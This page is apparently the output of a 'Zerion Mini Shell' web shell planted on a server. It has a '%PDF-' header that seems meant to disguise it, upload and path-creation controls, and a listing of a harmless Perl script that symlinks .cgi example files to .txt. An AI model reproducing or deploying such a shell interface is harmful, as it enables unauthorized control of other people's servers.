%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/share/perl5/CGI/examples/
Upload File :
Create Path :
Current File : //usr/share/perl5/CGI/examples/make_links.pl

#!/usr/local/bin/perl

# this is just a utility for creating symlinks from *.txt to *.cgi
# for documentation purposes.
foreach (<*.cgi>) {
    ($target=$_)=~s/cgi$/txt/;
    symlink $_,$target
}

Zerion Mini Shell 1.0